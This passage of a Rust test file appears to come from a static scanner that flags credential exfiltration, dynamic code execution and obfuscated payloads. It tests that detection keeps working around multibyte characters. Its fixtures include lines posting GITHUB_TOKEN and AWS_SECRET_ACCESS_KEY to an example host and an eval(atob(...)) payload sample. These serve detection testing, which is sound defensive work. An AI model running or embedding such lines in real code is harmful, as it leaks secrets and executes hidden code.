1111 assert!(
1112 !findings
1113 .iter()
1114 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1115 "secret in token: after body: a-- / 2 should NOT fire"
1116 );
1117 }
1118
1119 #[test]
1125 fn test_safe_start_clamps_into_multibyte() {
1126 let s = "═ab";
1128 assert_eq!(safe_start(s, 0), 0);
1129 assert_eq!(safe_start(s, 1), 3);
1130 assert_eq!(safe_start(s, 2), 3);
1131 assert_eq!(safe_start(s, 3), 3);
1132 }
1133
1134 #[test]
1135 fn test_safe_end_clamps_into_multibyte() {
1136 let s = "═ab";
1138 assert_eq!(safe_end(s, 0), 0);
1139 assert_eq!(safe_end(s, 1), 0);
1140 assert_eq!(safe_end(s, 2), 0);
1141 assert_eq!(safe_end(s, 3), 3);
1142 }
1143
1144 #[test]
1145 fn test_dynamic_code_no_panic_on_box_drawing_chars() {
1146 let mut input = concat!("e", "val(x); a", "tob(y);\n// ").to_string();
1150 for _ in 0..250 {
1151 input.push('═');
1152 }
1153 let findings = check(&input, Some("test.js"));
1154 assert!(
1155 findings
1156 .iter()
1157 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1158 "dynamic-code pair should still fire when window edge lands inside a multi-byte char"
1159 );
1160 }
1161
1162 #[test]
1163 fn test_obfuscated_payload_no_panic_on_trailing_multibyte() {
1164 let b64 = "A".repeat(60);
1166 let mut input = String::new();
1167 input.push('e');
1168 input.push_str("val(a");
1169 input.push_str("tob(\"");
1170 input.push_str(&b64);
1171 input.push_str("\"));\n// ");
1172 for _ in 0..250 {
1173 input.push('═');
1174 }
1175 let findings = check(&input, Some("test.js"));
1176 assert!(
1177 findings
1178 .iter()
1179 .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
1180 "obfuscated-payload detection should still fire with trailing multi-byte chars"
1181 );
1182 }
1183
1184 #[test]
1185 fn test_dynamic_code_no_panic_on_leading_multibyte() {
1186 let mut input = String::new();
1189 for _ in 0..250 {
1190 input.push('═');
1191 }
1192 input.push_str(concat!("\ne", "val(x); a", "tob(y);\n"));
1193 let findings = check(&input, Some("test.js"));
1194 assert!(
1195 findings
1196 .iter()
1197 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
1198 "dynamic-code pair should fire even when window start lands inside a leading multi-byte char"
1199 );
1200 }
1201
1202 #[test]
1203 fn test_js_exfil_no_panic_on_non_ascii_args() {
1204 let input = r#"fetch("https://api.example.com/═══", {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
1207 let _ = check(input, Some("test.js"));
1208 }
1209
1210 #[test]
1211 fn test_py_exfil_no_panic_on_non_ascii_args() {
1212 let input = r#"requests.post("https://api.example.com/═══", data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
1213 let _ = check(input, Some("test.py"));
1214 }
1215
1216 #[test]
1217 fn test_scan_plain_python_with_box_drawing_no_panic() {
1218 let mut input = String::from("# ");
1221 for _ in 0..250 {
1222 input.push('═');
1223 }
1224 input.push_str("\nprint('hello')\n");
1225 let findings = check(&input, Some("test.py"));
1226 assert!(
1227 findings.is_empty(),
1228 "plain file with only box-drawing chars should produce no findings, got {findings:?}"
1229 );
1230 }
1231}